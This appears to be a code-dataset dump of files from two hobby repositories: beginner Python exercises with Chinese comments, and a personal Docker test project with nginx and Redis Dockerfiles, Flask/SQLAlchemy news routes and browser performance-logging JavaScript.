"text": "###########判斷###########\n# if 條件:\n# 條件成立做這事,不成立往下\n# elif 條件:\n# 條件成立做這事,不成立往下\n# else:\n# 以上條件都不成立做這事\n\nx=input(\"請輸入數字\")\nx=int(x) # 轉型態\nif x>100:\n print(\"超過100\")\nelif x>50:\n print(\"超過50\")\nelse:\n print(\"小於50\")\n\n###########迴圈###########\n# while\n# for\n# while + for OR for + while\n####控制迴圈####\n# break \t 终止迴圈,並且跳出整個迴圈\n# continue 终止當前迴圈,跳出此次迴圈,執行下一次迴圈\n# pass pass是空語句,是為了保持程式结構的完整\n\nnumbers = [12,37,5,42,8,3]\neven = []\nodd = []\nwhile len(numbers) > 0 :\n print(numbers)\n number = numbers.pop()\n if(number % 2 == 0):\n even.append(number)\n print(even)\n print(odd)\n else:\n odd.append(number)\n print(even)\n print(odd)\n\n################################## \nfor numm in range(10,20): # 印出 10 到 20 之间的数字(含頭不含尾)\n print(numm)\n\n##################################\nfor num in range(10,20): # 迭代 10 到 20 之间的数字\n for i in range(2,num): # 根据因子迭代\n if num%i == 0: # 确定第一个因子\n j=num/i # 计算第二个因子\n print ('%d 等于 %d * %d' % (num,i,j))\n break # 跳出当前循环\n else: # 循环的 else 部分\n print (num, '是一个质数')\n"
},
{
"alpha_fraction": 0.5150375962257385,
"alphanum_fraction": 0.5150375962257385,
"avg_line_length": 28.55555534362793,
"blob_id": "18681b9c1473cb684705e1786e920e1b1b216a17",
"content_id": "e698e2bd81f6e05fb4a5ed01993ef86ce13c2f51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 266,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 9,
"path": "/自學聖經/08_例外處理.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "while(True):\n try:\n a = int(input('pls intput a number : '))\n b = int(input('pls intput a number : '))\n r = a % b\n except (ValueError,ZeroDivisionError) as err:\n print('find {} error' .format(err))\n else:\n print('r = ',r)\n"
},
{
"alpha_fraction": 0.5483871102333069,
"alphanum_fraction": 0.5967742204666138,
"avg_line_length": 19.66666603088379,
"blob_id": "30f05d4bbd85f8f78133ed4342e0691afa243f8d",
"content_id": "9ababa79ebb532f031b8a432d39c5db6c7841c7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 76,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 3,
"path": "/自學聖經/test.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "name = '王小葳'\nheight = 160\nprint('%s 的身高為 %d' % (name,height))\n"
},
{
"alpha_fraction": 0.2526997923851013,
"alphanum_fraction": 0.2958963215351105,
"avg_line_length": 13.5,
"blob_id": "3792b51a4361e38ff97eda12a5146e149caff23d",
"content_id": "ff7adeed033801bec0c83bd6996f329dac972836",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 549,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 32,
"path": "/01.DataType.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "#########資料表述#########\n\n# --------------------------------\n# 數字\n1231321\n3.131\n# ---------------------\n# 字串\n\"walala啊哈\"\n'哈哈'\n# ---------------------\n# 布林\nTrue\nFalse\n# ---------------------\n# List 有順序、可動列表\n[3,4,5]\n['hello',\"world\"]\n# ---------------------\n# Tuple 有順序、不可動列表\n(3,4,5)\n('hello',\"world\")\n# ---------------------\n# Set 集合\n{3,4,5}\n{'hello',\"world\"}\n# ---------------------\n# Dictionary 字典\n# {'鍵':'值'}\n{\"apple\":\"蘋果\",'DATA':'資料'}\n# ---------------------\n# 變數"
},
{
"alpha_fraction": 0.6875,
"alphanum_fraction": 0.6875,
"avg_line_length": 15,
"blob_id": "c25207d5d215dda9a5709e04e3b15dd1e60d85ce",
"content_id": "35f3db8a0511c112bcee5cad00824a995169be31",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 38,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 2,
"path": "/自學聖經/README.md",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "# Python_practice\n### 練習Python\n"
},
{
"alpha_fraction": 0.5263158082962036,
"alphanum_fraction": 0.5506072640419006,
"avg_line_length": 19.66666603088379,
"blob_id": "29ed703a41a49da5281f662d5bdf84dc6a23fac5",
"content_id": "acf3f0415b7810d96fdfcf5af9b9c32d7bccdcfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 271,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 12,
"path": "/抽籤.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "import random\nimport time\n\npeople = ['a','b','c','d','e','f','g','h','i']\n\nfor i in range(2):\n lucky = random.sample(people,9)\n random.shuffle(people)\n if i < 1:\n print('按造順序1~9份',lucky)\n else:\n print('恭喜你多做一份',people[0])"
},
{
"alpha_fraction": 0.5738636255264282,
"alphanum_fraction": 0.668181836605072,
"avg_line_length": 27.354839324951172,
"blob_id": "037edbd868cdc973f48d9e873b2f2c4f8180d010",
"content_id": "76acc5f52687ae602c2e6f0b1325b1927c4080d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 940,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 31,
"path": "/自學聖經/05_函數與模組.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "import math\ndef GetArea(width, height):\n area = width * height\n return area\nsquare_area = GetArea(7,16)\nprint(square_area) #112\n\n# square_area_01 = GetArea(7,16)\n# square_area_02 = GetArea(width = 7,height = 16)\n# square_area_03 = GetArea(height = 16,width = 7)\n# square_area_01 = square_area_02 = square_area_03 # 三者相等\n\n\ndef Circle(ardius):\n area = ardius * ardius * math.pi\n length = ardius * 2 * math.pi\n return area, length\ncircle_area, circumference = Circle(5) # circumference(圓周長)\nprint(circle_area, circumference) # 78.53981633974483 31.41592653589793\nprint(int(circle_area), int(circumference)) # 78, 31\n\n\n\n# 全域變數 & 區域變數\ndef GetArea_01(width, height):\n area = width * height # area 為區域變數\n global aarea # aarea 為全域變數\n aarea = 1\n return area\ngetarea_01 = GetArea_01(7,16) # getarea_01 為全域變數\nprint(getarea_01,\",\", aarea) # 112 , 1\n\n"
}
] | 13 |
enterpriseih/dockertest | https://github.com/enterpriseih/dockertest | d9630bc20893a970c0148633f8f86cba27c2a075 | f05bce55967ecb91a4694a863881f33ecb8ee916 | 1c3c54897139f23357b8a9d7f52feb0af535634d | refs/heads/master | 2023-08-15T20:41:42.318482 | 2021-07-21T05:37:07 | 2021-07-21T05:37:07 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6963979601860046,
"alphanum_fraction": 0.7229845523834229,
"avg_line_length": 32.31428527832031,
"blob_id": "7dc9ccc109e76e93c295dbd8c2920729af1ae331",
"content_id": "dc49ccdae6f3dad1c92fd4bdf6b0f54a95e94852",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1166,
"license_type": "no_license",
"max_line_length": 329,
"num_lines": 35,
"path": "/nginx/Dockerfile",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "FROM nginx:1.17.9\n\nMAINTAINER [email protected]\n\nWORKDIR /usr/share/nginx/html\n\nRUN chmod -R 777 /usr/share/nginx/html\nRUN chmod -R 777 /var/log/nginx/\nRUN chmod -R 777 /etc/nginx/conf.d/\n\nEXPOSE 80\n#CMD [\"nginx\",\"-g\",\"daemon off;\"]\n\n\n\n#nginx version: nginx/1.17.9\n\n#/etc/nginx#\n#/etc/nginx/conf.d\n#/var/log/nginx/host.access.log\n#/usr/share/nginx/html\n\n# docker run -it -p 80:80 -v `pwd`/logs:/var/log/nginx dockerfile/nginx\n\n#/git.yonyou.com/docker/nginx\n\n\n\n\n#docker build -t nginx:html .\n# docker run -p 80:80 --name nginx --network testnet -v /git.yonyou.com/docker/nginx/html:/usr/share/nginx/html -v /git.yonyou.com/docker/nginx/log/:/var/log/nginx/ -v /git.yonyou.com/docker/nginx/conf/default.conf:/etc/nginx/conf.d/default.conf -v /git.yonyou.com/docker/nginx/conf/nginx.conf:/etc/nginx/nginx.conf -d nginx:html\n\n# docker run -p 80:80 --name nginx -v /git.yonyou.com/docker/nginx/html:/usr/share/nginx/html -v /git.yonyou.com/docker/nginx/log/:/var/log/nginx/ -v /git.yonyou.com/docker/nginx/conf/default.conf:/etc/nginx/conf.d/default.conf -v /git.yonyou.com/docker/nginx/conf/nginx.conf:/etc/nginx/nginx.conf -d nginx:html\n# docker stop nginx\n# docker start nginx\n"
},
{
"alpha_fraction": 0.5515308976173401,
"alphanum_fraction": 0.5628758668899536,
"avg_line_length": 27.69411849975586,
"blob_id": "3ffdf58bb0f717cd2d419d3b9e6111c1a3a58bc0",
"content_id": "412f33227adbedd15bd02e1a793a5cbf316f4d33",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7546,
"license_type": "no_license",
"max_line_length": 188,
"num_lines": 255,
"path": "/python/python-web/apps/routers/news.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nfrom flask import Blueprint,render_template\nimport random\nfrom ..utils.json import jsonDumps,jsonLoads\nfrom ..model.News import News\nnewsIndex=Blueprint('news_index',__name__)\n\[email protected]('/news')\ndef news_index():\n movies = [\n {'name' : 'My Neighbor Totoro','year':'1988'},\n {'name': 'Three Colours trilogy', 'year': '1993'},\n {'name': 'Forrest Gump', 'year': '1994'},\n {'name': 'Perfect Blue', 'year': '1997'},\n {'name': 'The Matrix', 'year': '1999'},\n {'name': 'Memento', 'year': '2000'},\n {'name': 'The Bucket list', 'year': '2007'},\n {'name': 'Black Swan', 'year': '2010'},\n {'name': 'Gone Girl', 'year': '2014'},\n {'name': 'CoCo', 'year': '2017'}]\n return render_template('news/index.html',data={\"movies\":movies})\n return 'news.index'\n\[email protected]('/news/add')\ndef news_add():\n \"\"\"模拟添加数据\"\"\"\n i = 0\n while True:\n i+=1\n if(i>10):\n break\n news1 = News(title='标题'+str(random.randint(100,1000)),code='编码'+str(random.randint(100,1000)),name=str(i)+'我的名字'+str(random.randint(100,1000)))\n News.add(news1)\n return 'news.add'\[email protected]('/news/count')\ndef news_count():\n '''查询总共有多少条数据'''\n count = News.query.count()\n data = {\n 'data': count,\n 'message': '查询总数成功!',\n 'success': True,\n 'code': 1\n }\n return jsonDumps(data)\n\[email protected]('/news/all')\ndef news_all():\n '''查询所有数据'''\n data = {\n 'data': []\n }\n try:\n queryall = News.query.all()\n for item in queryall:\n data['data'].append({\n 'id': item.id,\n 'newsclassid': item.newsclassid,\n 'title': item.title,\n 'keywork': item.keywork,\n 'description': item.description,\n 'addtime': item.addtime,\n 'updatetime': item.updatetime,\n 'deletetime': item.deletetime,\n 'order': item.order,\n 'code': item.code,\n 'name': item.name,\n 'pinyinname': item.pinyinname,\n 'cnname': item.cnname,\n 'enname': item.enname,\n 'color': item.color,\n 'classname': item.classname,\n 'style': item.style,\n 'link': item.link,\n 'author': item.author,\n 'image': item.image,\n 'smallimage': item.smallimage,\n 'bigimage': item.bigimage,\n 'desc': item.desc,\n 'isdefault': item.isdefault,\n 'ishot': item.ishot,\n 'isstatic': item.isstatic,\n 'isdelete': item.isdelete,\n 'isrecommend': item.isrecommend,\n 'count': item.count,\n })\n except BaseException:\n data['success'] = False \n data['code'] = 0 \n data['message'] = '查询数据失败'\n else:\n data['success'] = True \n data['code'] = 1\n data['message'] = '查询数据成功'\n return jsonDumps(data)\n\[email protected]('/news/first')\ndef news_first():\n '''查询第一数据'''\n data = {}\n try:\n item = News.query.first()\n data['data'] = {\n 'id': item.id,\n 'newsclassid': item.newsclassid,\n 'title': item.title,\n 'keywork': item.keywork,\n 'description': item.description,\n 'addtime': item.addtime,\n 'updatetime': item.updatetime,\n 'deletetime': item.deletetime,\n 'order': item.order,\n 'code': item.code,\n 'name': item.name,\n 'pinyinname': item.pinyinname,\n 'cnname': item.cnname,\n 'enname': item.enname,\n 'color': item.color,\n 'classname': item.classname,\n 'style': item.style,\n 'link': item.link,\n 'author': item.author,\n 'image': item.image,\n 'smallimage': item.smallimage,\n 'bigimage': item.bigimage,\n 'desc': item.desc,\n 'isdefault': item.isdefault,\n 'ishot': item.ishot,\n 'isstatic': item.isstatic,\n 'isdelete': item.isdelete,\n 'isrecommend': item.isrecommend,\n 'count': item.count,\n }\n except BaseException:\n data['success'] = False \n data['code'] = 0 \n data['message'] = '查询数据失败'\n else:\n data['success'] = True \n 
data['code'] = 1\n data['message'] = '查询数据成功'\n return jsonDumps(data)\[email protected]('/news/get/<id>',methods=['get','post'])\ndef news_get(id):\n '''查询第一数据'''\n data = {}\n try:\n item = News.query.get(id)\n data['data'] = {\n 'newsclassid': item.newsclassid,\n 'title': item.title,\n 'keywork': item.keywork,\n 'description': item.description,\n 'addtime': item.addtime,\n 'updatetime': item.updatetime,\n 'deletetime': item.deletetime,\n 'order': item.order,\n 'code': item.code,\n 'name': item.name,\n 'pinyinname': item.pinyinname,\n 'cnname': item.cnname,\n 'enname': item.enname,\n 'color': item.color,\n 'classname': item.classname,\n 'style': item.style,\n 'link': item.link,\n 'author': item.author,\n 'image': item.image,\n 'smallimage': item.smallimage,\n 'bigimage': item.bigimage,\n 'desc': item.desc,\n 'isdefault': item.isdefault,\n 'ishot': item.ishot,\n 'isstatic': item.isstatic,\n 'isdelete': item.isdelete,\n 'isrecommend': item.isrecommend,\n 'count': item.count,\n }\n except BaseException:\n data['success'] = False \n data['code'] = 0 \n data['message'] = '查询数据失败'\n else:\n data['success'] = True \n data['code'] = 1\n data['message'] = '查询数据成功'\n return jsonDumps(data)\n\n\[email protected]('/news/page')\ndef news_page():\n \"\"\"分页查询, 每页3个, 查询第2页的数据\"\"\"\n data = {\n 'data': []\n }\n # print(len(queryall))\n try:\n page = 1\n per_page = 3\n # queryall = News.query.order_by('id').paginate(page, per_page, error_out=True, max_per_page=None)\n # queryall = News.query.order_by(News.order,News.addtime,News.id.desc()).paginate(page, per_page, error_out=True, max_per_page=None)\n queryall = News.query.filter(News.name.like('%我的名字%'),News.code.like('%1%')).order_by(News.id.asc(),News.order,News.addtime).paginate(page, per_page, error_out=True, max_per_page=None)\n for item in queryall.items:\n data['data'].append({\n 'id': item.id,\n 'newsclassid': item.newsclassid,\n 'title': item.title,\n 'keywork': item.keywork,\n 'description': item.description,\n 'addtime': item.addtime,\n 'updatetime': item.updatetime,\n 'deletetime': item.deletetime,\n 'order': item.order,\n 'code': item.code,\n 'name': item.name,\n 'pinyinname': item.pinyinname,\n 'cnname': item.cnname,\n 'enname': item.enname,\n 'color': item.color,\n 'classname': item.classname,\n 'style': item.style,\n 'link': item.link,\n 'author': item.author,\n 'image': item.image,\n 'smallimage': item.smallimage,\n 'bigimage': item.bigimage,\n 'desc': item.desc,\n 'isdefault': item.isdefault,\n 'ishot': item.ishot,\n 'isstatic': item.isstatic,\n 'isdelete': item.isdelete,\n 'isrecommend': item.isrecommend,\n 'count': item.count,\n })\n except BaseException:\n data['success'] = False \n data['code'] = 0 \n data['message'] = '查询数据失败'\n else:\n data['success'] = True \n data['code'] = 1\n data['message'] = '查询数据成功'\n return jsonDumps(data)\n\n\n# @news.route('/')\n# class News(object):\n# def show():\n# return 'news.show'\n\n# def show():\n# print(news)\n# print(__name__)\n# return 'news.hello'"
},
{
"alpha_fraction": 0.6945898532867432,
"alphanum_fraction": 0.6998254656791687,
"avg_line_length": 26.33333396911621,
"blob_id": "d9a8f6fb3f730bd18b8520f1d9958e531a13d3c0",
"content_id": "70f8ad549fd3915b69acf880978600d9aaeee310",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 573,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 21,
"path": "/python/python-web/apps/routers/main.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nfrom flask import Blueprint,render_template\nfrom .. import app\nfrom flask_sqlalchemy import SQLAlchemy\nfrom ..model.News import News\n# db = SQLAlchemy(app)\nMain=Blueprint('main',__name__)\n# print(dir(News))\[email protected]('/')\ndef main():\n # db = SQLAlchemy()\n # return str(dir(db))\n # db.init_app(app)\n # return str(app.config['SQLALCHEMY_DATABASE_URI'])\n # return dir(SQLAlchemy)\n # return app.config['SQLALCHEMY_DATABASE_URI']\n \n # db = SQLAlchemy(app,use_native_unicode='utf8')\n return render_template('main.html')\n return 'main'"
},
{
"alpha_fraction": 0.7427701950073242,
"alphanum_fraction": 0.745814323425293,
"avg_line_length": 24.230770111083984,
"blob_id": "adf6bcd46204bf27046c1b1bcae6bb2eb68c0e8b",
"content_id": "e6e6baaef3d2c6415003e029dcfebde29dd444e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 657,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 26,
"path": "/python/python-web/apps/routers/__init__.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nfrom .main import Main\nfrom .newsclass import newsClassIndex\nfrom .news import newsIndex\nfrom .user import userIndex\nfrom .data import dataIndex\nfrom .test import testIndex\ndef Router(app):\n app.register_blueprint(Main,url_prefix='/')\n app.register_blueprint(newsIndex)\n app.register_blueprint(userIndex)\n app.register_blueprint(newsClassIndex)\n app.register_blueprint(dataIndex)\n app.register_blueprint(testIndex)\n\n # app.register_blueprint(news_add,url_prefix='/news/add')\n# from flask import Blueprint\n# from .news import News\n\n# n = News()\n# new=Blueprint('news',__name__)\n\n# print(n)\n# @new.route('/')\n# n.show\n\n"
},
{
"alpha_fraction": 0.6329454183578491,
"alphanum_fraction": 0.6365264058113098,
"avg_line_length": 22.27083396911621,
"blob_id": "3b752cd0347289cd8950eca80749a2d996dd2799",
"content_id": "501101830df2d5cd99f1575fb7a60d5d046c6d45",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1261,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 48,
"path": "/python/python-web/apps/model/Base.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\n\nfrom ..database import db\n\nclass Base():\n @staticmethod\n def dropTable():\n db.drop_all()\n @staticmethod\n def createTable():\n db.create_all()\n @staticmethod\n def add(model):\n # try:\n db.session.add(model)\n db.session.commit()\n # except:\n db.session.rollback()\n # return False\n # else:\n # return True\n @staticmethod\n def delete(model):\n try:\n db.session.delete(model)\n db.session.commit()\n except:\n db.session.rollback()\n return False\n else:\n return True\n @staticmethod\n def querall(model):\n return db.session.query(model).filter().all()\n @staticmethod\n def querpage(model,page,per_page):\n max_per_page=None\n error_out=False\n # page 查询的页数\n # per_page 每页的条数\n # max_per_page 每页最大条数,有值时,per_page 受它影响\n # error_out 当值为 True 时,下列情况会报错\n # 当 page 为 1 时,找不到任何数据\n # page 小于 1,或者 per_page 为负数\n # page 或 per_page 不是整数\n # 该方法返回一个分页对象 Pagination\n return db.session.query(model).filter_by().paginate(page=page, per_page=per_page,error_out=error_out, max_per_page=max_per_page)\n"
},
{
"alpha_fraction": 0.6677186489105225,
"alphanum_fraction": 0.6708746552467346,
"avg_line_length": 37.921051025390625,
"blob_id": "5598414eb360d30a5b7b9faf09717e4014d01983",
"content_id": "54cf80ebfc0de66df4584e847b70ae46576e9682",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4444,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 114,
"path": "/python/python-web/apps/routers/newsclass.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nfrom flask import Blueprint,render_template,request\nfrom ..utils.json import jsonDumps,jsonLoads\nfrom ..model.NewsClass import NewsClass\n\n\n\nnewsClassIndex=Blueprint('news_class_index',__name__)\n\[email protected]('/newsclass')\ndef news_class_index():\n all_results = NewsClass.querall(NewsClass)\n print(len(all_results))\n return 'news.class.index'\n\[email protected]('/newsclass/add',methods=['POST','GET'])\ndef news_add():\n # data1 = request.get_data(as_text=True)\n # data2 = request.get_data()\n # data3 = json.loads(data1)\n # print(data1,data2)\n # print(list(data3.keys()))\n data = jsonLoads()\n for item in data['data']:\n newsclass = NewsClass()\n newsclass.title = item['title'] if 'title' in item else None\n newsclass.keywork = item['keywork'] if 'keywork' in item else None\n newsclass.description = item['description'] if 'description' in item else None\n newsclass.addtime = item['addtime'] if 'addtime' in item else None\n newsclass.updatetime = item['updatetime'] if 'updatetime' in item else None\n newsclass.deletetime = item['deletetime'] if 'deletetime' in item else None\n newsclass.order = item['order'] if 'order' in item else None\n newsclass.code = item['code'] if 'code' in item else None\n newsclass.name = item['name'] if 'name' in item else None\n newsclass.pinyinname = item['pinyinname'] if 'pinyinname' in item else None\n newsclass.cnname = item['cnname'] if 'cnname' in item else None\n newsclass.enname = item['enname'] if 'enname' in item else None\n newsclass.color = item['color'] if 'color' in item else None\n newsclass.classname = item['classname'] if 'classname' in item else None\n newsclass.style = item['style'] if 'style' in item else None\n newsclass.link = item['link'] if 'link' in item else None\n newsclass.author = item['author'] if 'author' in item else None\n newsclass.image = item['image'] if 'image' in item else None\n newsclass.smallimage = item['smallimage'] if 'smallimage' in item else None\n newsclass.bigimage = item['bigimage'] if 'bigimage' in item else None\n newsclass.desc = item['desc'] if 'desc' in item else None\n newsclass.isdefault = item['isdefault'] if 'isdefault' in item else None\n newsclass.ishot = item['ishot'] if 'ishot' in item else None\n newsclass.isstatic = item['isstatic'] if 'isstatic' in item else None\n newsclass.isdelete = item['isdelete'] if 'isdelete' in item else None\n newsclass.isrecommend = item['isrecommend'] if 'isrecommend' in item else None\n newsclass.count = item['count'] if 'count' in item else None\n newsclass.pcode = item['pcode'] if 'pcode' in item else None\n # for key in list(item.keys()):\n # nc[key] = item[key]\n NewsClass.add(newsclass)\n # print(item[key])\n # print(item['name'])\n # print(len(data['data']))\n # return \"{}\"\n # for key in list(data3.keys):\n # print(key)\n # print(data3)\n # print(data3.keys)\n # print(json.loads(data2.decode('utf-8')))\n source = {}\n source['list'] = []\n source['success'] = True\n source['message'] = '查询成功'\n alllist = NewsClass.querall(NewsClass)\n for newsclass in alllist:\n source['list'].append({\n 'title': newsclass.title,\n 'keywork': newsclass.keywork,\n 'description': newsclass.description,\n 'addtime': newsclass.addtime,\n 'updatetime': newsclass.updatetime,\n 'deletetime': newsclass.deletetime,\n 'order': newsclass.order,\n 'code': newsclass.code,\n 'name': newsclass.name,\n 'pinyinname': newsclass.pinyinname,\n 'cnname': newsclass.cnname,\n 'enname': newsclass.enname,\n 'color': newsclass.color,\n 
'classname': newsclass.classname,\n 'style': newsclass.style,\n 'link': newsclass.link,\n 'author': newsclass.author,\n 'image': newsclass.image,\n 'smallimage': newsclass.smallimage,\n 'bigimage': newsclass.bigimage,\n 'desc': newsclass.desc,\n 'isdefault': newsclass.isdefault,\n 'ishot': newsclass.ishot,\n 'isstatic': newsclass.isstatic,\n 'isdelete': newsclass.isdelete,\n 'isrecommend': newsclass.isrecommend,\n 'count': newsclass.count,\n })\n return jsonDumps(source)\n # return json.dumps(source,ensure_ascii=False, cls=DateEncoder)\n # return 'news.add'\n\n# @news.route('/')\n# class News(object):\n# def show():\n# return 'news.show'\n\n# def show():\n# print(news)\n# print(__name__)\n# return 'news.hello'"
},
{
"alpha_fraction": 0.671480119228363,
"alphanum_fraction": 0.6787003874778748,
"avg_line_length": 33.75,
"blob_id": "7ba4aa71a279a3fec53583fefe3d9ccb07cd68b9",
"content_id": "0eb836e12a846f5ed70f76fef5cbb7e2a049ebaf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 277,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 8,
"path": "/python/python-web/run.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nfrom apps import app\n# app.config.update(DEBUG=app.config['DEBUG']) \n# app.config.update(HOST=app.config['HOST']) \nif __name__ == '__main__':\n app.run(host=app.config['HOST'],port=app.config['PROT'],debug=app.config['DEBUG'])\n# static_url_path"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6764886379241943,
"avg_line_length": 22.955883026123047,
"blob_id": "caf34beae7d8e9cd30472f0f706bd1150b1511dc",
"content_id": "78dc3efaffc512bf01a56ac0a28ef9770ccac46c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1637,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 68,
"path": "/nginx/html/test/js/a.js",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "\n// window.addEventListener('error',function(...reset){\n// \tconsole.log(reset)\n// },false)\n// window.onerror=function(message,source,lineno,colno,error){\n// \tconsole.log(message,source,lineno,colno,error)\n// }\nwindow.onerror=function(...args){\n\tconsole.log('args',args)\n}\n\nwindow.onunhandledrejection=function(event){\n\tevent = event || window.event\n\tvar errorMsg = \"\"\n\tvar errorStack = \"\"\n\tif(typeof event.reason === 'object'){\n\t\terrorMsg = event.reason.message;\n\t\terrorStack = event.reason.stack;\n\t}else{\n\n\t}\n}\n\nwindow.onload=function(){\n let ziyuan = window.performance.getEntries()\n // console.log(ziyuan)\n let navigationsource = performance.getEntriesByType('navigation')\n // console.log(navigationsource)\n let resourceSource = performance.getEntriesByType('resource')\n // console.log(resourceSource)\n for(var i=0;i<resourceSource.length;i++){\n let name = resourceSource[i].name\n let item = performance.getEntriesByName(name)[0]\n console.log(item)\n console.log(item.toJSON())\n }\n}\n\n\n// performance.mark(\"Begin\");\n// let count=1\n// while(count<500){\n// count++\n// console.log('log')\n// }\n// performance.mark(\"End\");\n// performance.mark(\"Begin\");\n// count=1\n// while(count<500){\n// count++\n// console.log('log')\n// }\n// performance.mark(\"End\");\n// count=1\n// while(count<500){\n// count++\n// console.log('log')\n// }\n// performance.mark(\"End\");\n\n\n\nfunction perf_observer(list, observer) {\n console.log('list, observer',list, observer)\n // Process the \"measure\" event\n // 处理 \"measure\" 事件\n}\nvar observer2 = new PerformanceObserver(perf_observer);\nobserver2.observe({entryTypes: [\"measure\"]});"
},
{
"alpha_fraction": 0.34375,
"alphanum_fraction": 0.59375,
"avg_line_length": 10,
"blob_id": "61e99a9ba0829bb0fb467107148a2faaf4322554",
"content_id": "52f2254a757c3f3e1c1644095f73e02458dfaa4c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 32,
"license_type": "no_license",
"max_line_length": 13,
"num_lines": 3,
"path": "/nginx/html/test/js/c.js",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "let a = 333\nconst b = 444\nb = 88"
},
{
"alpha_fraction": 0.6174815893173218,
"alphanum_fraction": 0.666810929775238,
"avg_line_length": 24.977527618408203,
"blob_id": "d44f4ae204266e08305e1e3a2a0ca245116deed2",
"content_id": "42b79b84abb2fc0b26565e4f3f0dc896b14ffe53",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 2427,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 89,
"path": "/redis/Dockerfile",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "FROM centos:latest\n\nMAINTAINER [email protected]\n\nENV R_DIR /usr/local/redis\nENV I_DIR /opt/redis-6.0.9\n\n\nADD redis-6.0.9.tar.gz /usr/local\nRUN mv /usr/local/redis-6.0.9 $R_DIR\n# RUN yum -y upgrade\nRUN yum -y install gcc gcc-c++ make\nRUN cd $R_DIR \\\n && make \\\n && sed -i 's/\\# requirepass foobared/requirepass 123456/g' $R_DIR/redis.conf\n\n# && cd src/ \\\n# && make install PREFIX=/usr/local/redis\n#RUN mkdir -p /usr/local/redis && \\\n# cp $I_DIR/redis.conf $R_DIR/ && \\\n# cp $I_DIR/sentinel.conf $R_DIR/ && \\\n# cp $I_DIR/src/redis-benchmark $R_DIR && \\\n# cp $I_DIR/src/redis-check-aof $R_DIR && \\\n# cp $I_DIR/src/redis-check-dump $R_DIR && \\\n# cp $I_DIR/src/redis-cli $R_DIR && \\\n# cp $I_DIR/src/redis-sentinel $R_DIR && \\\n# cp $I_DIR/src/redis-server $R_DIR && \\\n# sed -i 's/\\# bind 127\\.0\\.0\\.1/bind 0\\.0\\.0\\.0/g' $R_DIR/redis.conf && \\\n# sed -i 's/\\# requirepass foobared/requirepass 123456/g' $R_DIR/redis.conf\n\n\nVOLUME [\"/usr/local/redis\"]\n\nEXPOSE 6379\n\n\nCMD [\"/usr/local/redis/src/redis-server\",\"/usr/local/redis/redis.conf\"]\n\n\n\n\n\n# logfile \"\"\n# dbfilename dump.rdb\n\n# docker build -t centos:redis .\n# docker run -p 6379:6379 --name redis -v /git.yonyou.com/docker/redis/redis.conf:/usr/local/redis/redis.conf -d centos:redis --network=mynet --ip 172.18.12.1 \n\n# docker run -p 6379:6379 --name redis -v /git.yonyou.com/docker/redis/redis.conf:/usr/local/redis/redis.conf -d centos:redis --net bridge --ip 192.168.0.2\n# docker exec -it redis bash\n# docker start redis \n# docker stop redis \n# ./redis-cli\n# auth \"yourpassword\"\n# 